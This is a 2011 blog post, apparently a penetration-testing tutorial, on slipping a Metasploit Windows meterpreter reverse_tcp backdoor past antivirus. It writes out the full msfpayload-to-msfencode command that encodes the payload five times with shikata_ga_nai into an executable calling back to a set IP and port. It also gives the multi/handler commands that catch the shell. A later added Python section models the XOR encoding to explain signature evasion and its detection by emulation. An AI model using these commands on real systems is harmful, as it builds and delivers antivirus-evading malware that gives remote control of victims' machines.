
Saturday, June 4, 2011

Bypassing Anti-Virus with msfencode.

Well, I recently posted about msfpayload and how to generate a backdoored exe with it. What I left out was msfencode, which is extremely useful because the "unpacked" executable is very likely to be detected by most Anti-Virus products. You can find my previous post here.

Now let's take what we learned from the last post and pipe the msfpayload output into msfencode.

~ $ msfpayload windows/meterpreter/reverse_tcp LHOST=19.84.20.11 LPORT=3030 R | msfencode -e x86/shikata_ga_nai -t exe -c 5 -o FuckMonsanto.exe

This pipes the raw payload into msfencode, which passes it through the encoder 5 times (-c specifies the number of times to run it through the encoder), using the polymorphic XOR encoder "shikata ga nai" (-e x86/shikata_ga_nai), and writes the result out as a Windows executable (-t exe) named "FuckMonsanto.exe".
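To show why a byte signature taken from the plain payload stops matching the file once it is encoded, while the bytes that any scanner emulating the decoder sees are unchanged, here is an added illustration that is not part of the original post and is not msfencode's real decoder stub: a simplified additive-feedback XOR model run for five passes, with the key and length header standing in for the stub and the sample payload constructed for the example.

```python
import os
import struct


def _dwords(data: bytes) -> list:
    """Split data into little-endian 32-bit words, zero-padding the tail."""
    data += b"\x00" * (-len(data) % 4)
    return [struct.unpack_from("<I", data, i)[0] for i in range(0, len(data), 4)]


def encode_pass(payload: bytes, key: int) -> bytes:
    """One additive-feedback XOR pass (simplified model, not the real stub):
    each word is XORed with the running key, then the plaintext word is added
    to the key.  Key and original length are emitted as an 8-byte header."""
    header = struct.pack("<II", key, len(payload))
    out = bytearray()
    for w in _dwords(payload):
        out += struct.pack("<I", w ^ key)
        key = (key + w) & 0xFFFFFFFF
    return header + bytes(out)


def decode_pass(blob: bytes) -> bytes:
    """Inverse of encode_pass: what an emulating scanner reconstructs."""
    key, length = struct.unpack_from("<II", blob, 0)
    out = bytearray()
    for w in _dwords(blob[8:]):
        plain = w ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & 0xFFFFFFFF
    return bytes(out)[:length]


def encode(payload: bytes, iterations: int = 5, rng=os.urandom) -> bytes:
    """Apply `iterations` passes with fresh random keys, like -c 5; each pass
    also encodes the previous pass's header, so nothing plain is left."""
    for _ in range(iterations):
        payload = encode_pass(payload, struct.unpack("<I", rng(4))[0])
    return payload


def decode(blob: bytes, iterations: int = 5) -> bytes:
    for _ in range(iterations):
        blob = decode_pass(blob)
    return blob


# Constructed stand-in for the unencoded stager; a static signature is a
# byte substring of it, as a naive file scanner would use.
SAMPLE_PAYLOAD = b"constructed stand-in for the plain reverse_tcp stager bytes"
SIGNATURE = SAMPLE_PAYLOAD[12:28]


def signature_matches(blob: bytes) -> bool:
    return SIGNATURE in blob
```

Two encodings of the same payload differ byte for byte and neither contains the signature, yet both decode to the same bytes where the signature matches again; that is the gap a file-hash or byte-pattern check leaves and an emulating or memory-scanning check closes.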

You can fire up the handler in metasploit the same way as before, but I would like to add that you can run things as a "job", which runs in the background, by using the "-j" option.

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 19.84.20.11
msf exploit(handler) > set LPORT 3030
msf exploit(handler) > exploit -j

Now you can continue with your pentest while the handler runs in the background and waits for connections; use the "jobs" command to list and interact with the jobs running in the background.
